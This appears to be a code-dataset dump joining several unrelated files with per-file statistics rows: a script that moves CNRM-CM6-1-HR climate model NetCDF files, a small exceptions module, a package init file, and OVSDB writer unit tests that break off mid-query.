'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750301-19750331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750401-19750430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750501-19750531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750601-19750630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750701-19750731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750801-19750831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750901-19750930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751001-19751031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751101-19751130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751201-19751231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740101-19740131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740201-19740228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740301-19740331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740401-19740430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740501-19740531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740601-19740630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740701-19740731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740801-19740831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740901-19740930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741001-19741031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741101-19741130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741201-19741231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750101-19750131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750201-19750228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750301-19750331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750401-19750430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790101-19790131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750501-19750531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750601-19750630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750701-19750731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750801-19750831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750901-19750930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751001-19751031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751101-19751130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780101-19780131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19751201-19751231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780201-19780228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780301-19780331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780401-19780430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780501-19780531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780601-19780630.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401010000-197412312359.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780701-19780731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780801-19780831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780901-19780930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781001-19781031.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501010000-197512312359.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781101-19781130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781201-19781231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790201-19790228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790301-19790331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790401-19790430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790501-19790531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790601-19790630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790701-19790731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790801-19790831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790901-19790930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791001-19791031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791101-19791130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791201-19791231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780101-19780131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780201-19780228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780301-19780331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780401-19780430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780501-19780531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780601-19780630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780701-19780731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780801-19780831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780901-19780930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781001-19781031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781101-19781130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19781201-19781231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790101-19790131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790201-19790228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790301-19790331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790401-19790430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790501-19790531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790601-19790630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790701-19790731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790801-19790831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790901-19790930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791001-19791031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791101-19791130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19791201-19791231.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801010000-197812312359.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901010000-197912312359.nc',
]
# we are expecting to move 1131 files so check that they're all there
if len(files_to_move) != 1131:
logger.error('Expected to move 1131 files, but {} are listed.'.format(len(files_to_move)))
sys.exit(1)
for partial_path in files_to_move:
src_path = os.path.join(base_input_dir, partial_path)
try:
shutil.move(src_path, dest_dir)
except Exception:
logger.error('Unable to move file {}'.format(src_path))
raise
if __name__ == "__main__":
cmd_args = parse_args()
# determine the log level
if cmd_args.log_level:
try:
log_level = getattr(logging, cmd_args.log_level.upper())
except AttributeError:
logger.setLevel(logging.WARNING)
logger.error('log-level must be one of: debug, info, warn or error')
sys.exit(1)
else:
log_level = DEFAULT_LOG_LEVEL
# configure the logger
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': DEFAULT_LOG_FORMAT,
},
},
'handlers': {
'default': {
'level': log_level,
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': log_level,
'propagate': True
}
}
})
# run the code
main(cmd_args)
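
The log-level handling above can be read in isolation: getattr(logging, name.upper()) maps a string such as 'debug' to the corresponding numeric logging constant, and an unrecognised name raises AttributeError. Below is a minimal sketch of that idea; the parse_log_level helper is illustrative and not part of the script.

import logging

def parse_log_level(name, default=logging.WARNING):
    # Map a user-supplied string such as 'debug' or 'INFO' to the numeric
    # logging constant; fall back to the default for unrecognised names.
    try:
        return getattr(logging, name.upper())
    except AttributeError:
        return default

assert parse_log_level('info') == logging.INFO
assert parse_log_level('nonsense') == logging.WARNING
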
| 92.483743
| 107
| 0.87974
| 17,450
| 116,622
| 5.421032
| 0.041891
| 0.083988
| 0.095986
| 0.119983
| 0.977853
| 0.976564
| 0.976564
| 0.976564
| 0.975982
| 0.975528
| 0
| 0.389768
| 0.01937
| 116,622
| 1,260
| 108
| 92.557143
| 0.437397
| 0.012939
| 0
| 0.005
| 0
| 0
| 0.945476
| 0.942078
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001667
| false
| 0
| 0.004167
| 0
| 0.006667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
8b0aa768429678c325e3c7cb6be22acfc7275186
| 273
|
py
|
Python
|
swtstore/classes/exceptions.py
|
janastu/swtstore
|
7326138bf2fbf2a4ed8c7300c68092f91709dfc2
|
[
"BSD-2-Clause"
] | 2
|
2015-04-28T00:35:21.000Z
|
2016-02-11T19:31:15.000Z
|
swtstore/classes/exceptions.py
|
janastu/swtstore
|
7326138bf2fbf2a4ed8c7300c68092f91709dfc2
|
[
"BSD-2-Clause"
] | 9
|
2015-02-02T11:24:23.000Z
|
2017-12-29T07:49:07.000Z
|
swtstore/classes/exceptions.py
|
janastu/swtstore
|
7326138bf2fbf2a4ed8c7300c68092f91709dfc2
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# classes/exceptions.py
from sqlalchemy.exc import DontWrapMixin
class AlreadyExistsError(Exception, DontWrapMixin):
pass
class InvalidPayload(Exception, DontWrapMixin):
pass
class ContextDoNotExist(Exception, DontWrapMixin):
pass
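
A hedged usage note: SQLAlchemy normally wraps exceptions raised while executing a statement in a StatementError, but exceptions that also inherit DontWrapMixin, as the classes above do, are re-raised unchanged. The check_payload helper below is purely illustrative and not part of the module.

from swtstore.classes.exceptions import InvalidPayload

def check_payload(payload):
    # Reject anything that is not a JSON object; because InvalidPayload
    # mixes in DontWrapMixin, SQLAlchemy will not hide it inside a
    # StatementError if it is raised during statement execution.
    if not isinstance(payload, dict):
        raise InvalidPayload('payload must be a JSON object')
    return payload
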
| 16.058824
| 51
| 0.758242
| 26
| 273
| 7.961538
| 0.653846
| 0.318841
| 0.376812
| 0.299517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004329
| 0.153846
| 273
| 16
| 52
| 17.0625
| 0.891775
| 0.153846
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.428571
| 0.142857
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
8c7f2be28de2050145234c94a56c3b0d55018345
| 218
|
py
|
Python
|
deepy/data/__init__.py
|
popura/deepy-pytorch
|
71d87a82e937d82b9b149041280a392cc24b7299
|
[
"MIT"
] | 1
|
2021-07-19T09:38:26.000Z
|
2021-07-19T09:38:26.000Z
|
deepy/data/__init__.py
|
popura/deepy-pytorch
|
71d87a82e937d82b9b149041280a392cc24b7299
|
[
"MIT"
] | 1
|
2021-07-26T06:47:45.000Z
|
2021-07-26T06:47:45.000Z
|
deepy/data/__init__.py
|
popura/deepy-pytorch
|
71d87a82e937d82b9b149041280a392cc24b7299
|
[
"MIT"
] | null | null | null |
import deepy.data.dataset
import deepy.data.transform
from deepy.data.dataset import SelfSupervisedDataset
from deepy.data.dataset import InverseDataset
from deepy.data.toydataset import ToyClassDataset, ToyRegDataset
| 36.333333
| 64
| 0.87156
| 27
| 218
| 7.037037
| 0.407407
| 0.236842
| 0.252632
| 0.347368
| 0.273684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077982
| 218
| 6
| 64
| 36.333333
| 0.945274
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8c84e2d5d860879138b737bfd3b223e741509f84
| 37,299
|
py
|
Python
|
networking_fujitsu/tests/unit/ml2/common/ovsdb/test_ovsdb_writer.py
|
mail2nsrajesh/networking-fujitsu
|
e3a5205999cb36f7d1ead3698ce7465c0a08eb2a
|
[
"Apache-2.0"
] | null | null | null |
networking_fujitsu/tests/unit/ml2/common/ovsdb/test_ovsdb_writer.py
|
mail2nsrajesh/networking-fujitsu
|
e3a5205999cb36f7d1ead3698ce7465c0a08eb2a
|
[
"Apache-2.0"
] | null | null | null |
networking_fujitsu/tests/unit/ml2/common/ovsdb/test_ovsdb_writer.py
|
mail2nsrajesh/networking-fujitsu
|
e3a5205999cb36f7d1ead3698ce7465c0a08eb2a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import mock
import random
import socket
from oslo_log import log as logging
from oslo_serialization import jsonutils
from networking_fujitsu.ml2.common.ovsdb import base_connection
from networking_fujitsu.ml2.common.ovsdb import constants as n_const
from networking_fujitsu.ml2.common.ovsdb import ovsdb_writer
from networking_fujitsu.tests.unit.ml2.common.ovsdb import (
test_base_connection as base_test)
from neutron.tests import base
LOG = logging.getLogger(__name__)
class TestOVSDBWriter(base.BaseTestCase):
def setUp(self):
super(TestOVSDBWriter, self).setUp()
self.op_id = 'abcd'
self.ovsdb_ip = "1.1.1.1"
self.ovsdb_port = 6640
self.sock = mock.patch('socket.socket').start()
self.fake_ovsdb = ovsdb_writer.OVSDBWriter(self.ovsdb_ip,
self.ovsdb_port)
self.fake_message = {'id': self.op_id,
'fake_key': 'fake_value'}
self.fake_ipaddrs = ["fake_ipaddr1", "fake_ipaddr2"]
self.fake_ovsdb.responses = [self.fake_message]
def test_process_response(self):
"""Test case to test _process_response."""
expected_result = {'fake_key': 'fake_value'}
with mock.patch.object(ovsdb_writer.OVSDBWriter,
'_response',
return_value={'fake_key': 'fake_value'}
) as resp:
result = self.fake_ovsdb._process_response(self.op_id)
self.assertEqual(result, expected_result)
resp.assert_called_with(self.op_id)
def test_process_response_with_error(self):
"""Test case to test _process_response with error."""
foo_dict = {'fake_key': 'fake_value',
'error': 'fake_error'}
with mock.patch.object(ovsdb_writer.OVSDBWriter,
'_response',
return_value=foo_dict) as resp:
self.assertRaises(base_connection.OVSDBError,
self.fake_ovsdb._process_response,
self.op_id)
resp.assert_called_with(self.op_id)
def test_process_response_with_error1(self):
"""Test case to test _process_response with errors in the
subqueries.
"""
fake_dict = {'id': '295366252499790541931626006259650283530',
'result':
[{'uuid':
['uuid', 'be236bbf-8f83-4bf0-816b-629c7e5b5609'
]},
{},
{'error': 'referential integrity violation',
'details': 'Table Ucast_Macs_Remote column '
'locator row '
'be236bbf-8f83-4bf0-816b-629c7e5b5609 '
'references nonexistent row '
'1b143819-45a6-44ec-826a-ac75243a07ce in '
'table Physical_Locator.'
}],
'error': None}
with mock.patch.object(ovsdb_writer.OVSDBWriter,
'_response',
return_value=fake_dict) as resp:
self.assertRaises(base_connection.OVSDBError,
self.fake_ovsdb._process_response,
self.op_id)
resp.assert_called_with(self.op_id)
def test_send_and_receive(self):
"""Test case to test _send_and_receive."""
with mock.patch.object(base_connection.BaseConnection,
'send', return_value=True
) as mock_send:
with mock.patch.object(ovsdb_writer.OVSDBWriter,
'_get_reply') as mock_reply:
self.fake_ovsdb._send_and_receive('some_query',
self.op_id, True)
mock_send.assert_called_with('some_query')
mock_reply.assert_called_with(self.op_id)
def test_send_and_receive_with_rcv_required_false(self):
"""Test case to test _send_and_receive."""
with mock.patch.object(base_connection.BaseConnection,
'send', return_value=True
) as mock_send:
with mock.patch.object(ovsdb_writer.OVSDBWriter,
'_get_reply') as mock_reply:
self.fake_ovsdb._send_and_receive('some_query',
self.op_id, False)
mock_send.assert_called_with('some_query')
mock_reply.assert_not_called()
def test_get_reply(self):
"""Test case to test _get_reply."""
ret_value = jsonutils.dumps({self.op_id:
'foo_value'})
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=jsonutils.dumps({
self.op_id: 'foo_value'})) as recv_data, \
mock.patch.object(ovsdb_writer.OVSDBWriter, '_process_response',
return_value=(ret_value, None)) as proc_response, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb._get_reply(self.op_id)
self.assertTrue(recv_data.called)
self.assertTrue(proc_response.called)
def test_get_reply_exception(self):
"""Test case to test _get_reply.
However, an unknown exception occurred while getting the response.
"""
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=jsonutils.dumps({
self.op_id: 'foo_value'})), \
mock.patch.object(ovsdb_writer.OVSDBWriter, '_process_response',
return_value=''), \
mock.patch.object(ast, 'literal_eval', side_effect=RuntimeError), \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.assertRaises(RuntimeError,
self.fake_ovsdb._get_reply,
self.op_id)
def test_get_reply_max_retried(self):
"""Test case to test _get_reply when MAX_RETRIES has been tried."""
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=''), \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.assertRaises(RuntimeError,
self.fake_ovsdb._get_reply,
self.op_id)
def test_recv_data(self):
"""Test case to test _recv_data with a valid data."""
n_const.BUFFER_SIZE = 5
fake_data_raw = '{"fake_key": "fake_value"}'
fake_socket = base_test.SocketClass(None,
None,
None,
fake_data_raw)
with mock.patch.object(socket, 'socket', return_value=fake_socket):
fake_obj = ovsdb_writer.OVSDBWriter(
self.ovsdb_ip, self.ovsdb_port)
result = fake_obj._recv_data()
self.assertEqual(fake_data_raw, result)
def test_recv_data_with_empty_data(self):
"""Test case to test _recv_data with empty data."""
fake_socket = base_test.SocketClass(None,
None,
None,
'')
with mock.patch.object(socket, 'socket',
return_value=fake_socket):
with mock.patch.object(ovsdb_writer.LOG, 'warning'):
fake_obj = ovsdb_writer.OVSDBWriter(
self.ovsdb_ip, self.ovsdb_port)
result = fake_obj._recv_data()
self.assertIsNone(result)
def test_recv_data_with_socket_error(self):
"""Test case to test _recv_data with socket error."""
fake_socket = base_test.SocketClass(None,
None,
socket.error)
with mock.patch.object(socket, 'socket', return_value=fake_socket):
with mock.patch.object(ovsdb_writer.LOG,
'warning') as fake_warn:
fake_obj = ovsdb_writer.OVSDBWriter(
self.ovsdb_ip, self.ovsdb_port)
result = fake_obj._recv_data()
self.assertIsNone(result)
fake_warn.assert_called_with("Did not receive any reply from "
"the OVSDB server")
def test_get_sw_ep_info(self):
"""Test case to test get_sw_ep_info."""
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'select',
'table': 'Physical_Switch',
'where': [],
'columns': ['tunnel_ips', 'name']}],
'id': self.op_id}
return_value_raw = '{"id":1,"result":[{"rows":[{"name":' \
'"fake_host_name","tunnel_ips":' \
'"fake_endpoint_ip"}]}],"error":null}'
return_value = return_value_raw.replace(':null', ':None')
self.fake_ovsdb.response = ast.literal_eval(return_value)
expected_result = ('fake_endpoint_ip', 'fake_host_name')
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=return_value_raw), \
mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
result = self.fake_ovsdb.get_sw_ep_info()
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
self.assertEqual(result, expected_result)
self.fake_ovsdb.responses = [self.fake_message]
def test_insert_logical_switch(self):
"""Test case to test insert_logical_switch."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'insert',
'table': 'Logical_Switch',
'row': {'name': 'fake_logical_switch_name',
'tunnel_key': 'fake_tunnel_key'}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.insert_logical_switch(
'fake_tunnel_key', 'fake_logical_switch_name', mock.ANY)
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_get_logical_switch_uuid(self):
"""Test case to test get_logical_switch_uuid."""
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'select',
'table': 'Logical_Switch',
'where': [['name', '==',
'fake_logical_switch_name']]}],
'id': self.op_id}
return_value_raw = '{"id":1,"result":[{"rows":[{"_version":' \
'["uuid","abcd"],"name":' \
'"fake_logical_switch_name",' \
'"description":"","tunnel_key":1,"_uuid":["uuid",' \
'"fake_logical_switch_uuid"]}]}],"error":null}'
return_value = return_value_raw.replace(':null', ':None')
self.fake_ovsdb.response = ast.literal_eval(return_value)
expected_result = 'fake_logical_switch_uuid'
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=return_value_raw), \
mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
result = self.fake_ovsdb.get_logical_switch_uuid(
'fake_logical_switch_name')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
self.assertEqual(result, expected_result)
self.fake_ovsdb.responses = [self.fake_message]
def test_delete_logical_switch(self):
"""Test case to test delete_logical_switch."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'delete',
'table': 'Mcast_Macs_Local',
'where': [['logical_switch', '==',
['uuid', 'fake_ls_uuid']]]},
{'op': 'delete',
'table': 'Logical_Switch',
'where': [['_uuid', '==',
['uuid', 'fake_ls_uuid']]]},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.delete_logical_switch(
'fake_ls_uuid', mock.ANY)
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_get_binding_vid(self):
"""Test case to test get_binding_vid."""
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'select',
'table': 'Physical_Port',
'where': [['vlan_bindings', '!=', ['map', []]]],
'columns': ['vlan_bindings']}],
'id': self.op_id}
return_value_raw = '{"id":1,"result":[{"rows":[{"vlan_bindings":[' \
'"map",[[21,["uuid","fake_logical_switch_uuid_21"' \
']]]]},{"vlan_bindings":["map",[[22,["uuid",' \
'"fake_logical_switch_uuid_22"]]]]}]}],' \
'"error":null}'
return_value = return_value_raw.replace(':null', ':None')
self.fake_ovsdb.response = ast.literal_eval(return_value)
expected_result = 21
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=return_value_raw), \
mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
result = self.fake_ovsdb.get_binding_vid(
'fake_logical_switch_uuid_21')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
self.assertEqual(result, expected_result)
self.fake_ovsdb.responses = [self.fake_message]
def test_update_physical_port(self):
"""Test case to test update_physical_port."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'update',
'table': 'Physical_Port',
'where': [['name', '==', 'fake_port_name']],
'row': {
'vlan_bindings': [
'map',
[['fake_vlanid', [
'uuid',
'fake_logical_switch_uuid']]]]}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.update_physical_port(
'fake_port_name', 'fake_vlanid',
'fake_logical_switch_uuid')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_get_ucast_macs_local(self):
"""Test case to test get_ucast_macs_local."""
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
